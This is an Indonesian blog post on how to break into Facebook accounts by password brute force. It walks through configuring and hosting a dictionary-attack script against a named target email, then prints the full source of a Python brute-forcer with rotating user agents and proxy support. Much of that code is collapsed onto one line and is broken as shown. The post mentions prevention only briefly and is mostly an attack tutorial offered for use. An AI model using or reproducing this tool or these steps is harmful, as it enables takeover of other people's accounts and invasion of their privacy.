PERTAMA:
Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.
KEDUA:
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.
Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory
setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja dihttp://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.
Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.
KETIGA:
Silakan download FbBruteforce:
Berikut Codenya:
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"P.S : add "&" to run in the background''' % (sys.argv[0], sys.argv[0], sys.argv[0])hme = '''Usage : %s [option]-h or --help for get help''' % sys.argv[0]def helpme():print facebookprint optionfile.write(facebook)file.write(option)sys.exit(1)def helpmee():print facebookprint hmefile.write(facebook)file.write(hme)sys.exit(1)for arg in sys.argv:try:if arg.lower() == '-u' or arg.lower() == '--user':username = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-w' or arg.lower() == '--wordlist':wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-l' or arg.lower() == '--log':log = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-p' or arg.lower() == '--proxy':useproxy = Trueproxy = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-k' or arg.lower() == '--userproxy':usepassproxy = Trueusw = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-i' or arg.lower() == '--passproxy':usepassproxy = Trueusp = sys.argv[int(sys.argv[1:].index(arg))+2]elif arg.lower() == '-v' or arg.lower() == '--verbose':verbose = Trueelif arg.lower() == '-h' or arg.lower() == '--help':helpme()elif len(sys.argv) <= 1:helpmee()except IOError:helpme()except NameError:helpme()except IndexError:helpme()def bruteforce(word):try:sys.stdout.write("\r[*] Trying %s... " % word)file.write("[*] Trying %s\n" % word)sys.stdout.flush()br.addheaders = [('User-agent', random.choice(ouruseragent))]opensite = br.open(fblogin)br.select_form(nr=0)br.form['email'] = usernamebr.form['pass'] = wordbr.submit()response = br.response().read()if verbose:print responseif success in response:print "\n\n[*] Logging in success..."print "[*] Username : %s" % (username)print "[*] Password : %s\n" % (word)file.write("\n[*] Logging in success...")file.write("\n[*] Username : %s" % (username))file.write("\n[*] Password : %s\n\n" % (word))sys.exit(1)except KeyboardInterrupt:print "\n[*] Exiting program...\n"sys.exit(1)except mechanize._mechanize.FormNotFoundError:print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")sys.exit(1)except mechanize._form.ControlNotFoundError:print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")sys.exit(1)def releaser():global wordfor word in words:bruteforce(word.replace("\n",""))def main():global brglobal wordstry:br = mechanize.Browser()cj = cookielib.LWPCookieJar()br.set_cookiejar(cj)br.set_handle_equiv(True)br.set_handle_gzip(True)br.set_handle_redirect(True)br.set_handle_referer(True)br.set_handle_robots(False)br.set_debug_http(False)br.set_debug_redirects(False)br.set_debug_redirects(False)br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)if useproxy:br.set_proxies({"http": proxy})if usepassproxy:br.add_proxy_password(usw, usp)if verbose:br.set_debug_http(True)br.set_debug_redirects(True)br.set_debug_redirects(True)except KeyboardInterrupt:print "\n[*] Exiting program...\n"file.write("\n[*] Exiting program...\n")sys.exit(1)try:preventstrokes = open(wordlist, "r")words = preventstrokes.readlines()count = 0while count < len(words):words[count] = words[count].strip()count += 1except IOError:print "\n[*] Error: Check your wordlist path\n"file.write("\n[*] Error: Check your wordlist path\n")sys.exit(1)except NameError:helpme()except KeyboardInterrupt:print "\n[*] Exiting program...\n"file.write("\n[*] Exiting program...\n")sys.exit(1)try:print facebookprint "\n[*] Starting attack at %s" % time.strftime("%X")print "[*] Account for bruteforcing %s" % (username)print "[*] Loaded :",len(words),"words"print "[*] Bruteforcing, please wait..."file.write(facebook)file.write("\n[*] Starting attack at %s" % time.strftime("%X"))file.write("\n[*] Account for bruteforcing %s" % (username))file.write("\n[*] Loaded : %d words" % int(len(words)))file.write("\n[*] Bruteforcing, please wait...\n")except KeyboardInterrupt:print "\n[*] Exiting program...\n"sys.exit(1)try:releaser()bruteforce(word)except NameError:helpme()if __name__ == '__main__':
main()
Nah, dari beberapa cara hack facebook dan pencegahannya di atas semoga anda lebih berhati-hati, untuk lebih detail mengenai tiap metode atau cara yang saya sebutkan di atas akan saya bahas di postingan saya yang selanjutnya, semoga
bermanfaat dan semoga akun facebook anda
0 komentar:
Posting Komentar
Tolong komentarnya Berhubungan dengan Artikel yng ada. komentar yang mengarah ke tindakan akan terhapus dan terjaring otomatis oleh sampah filter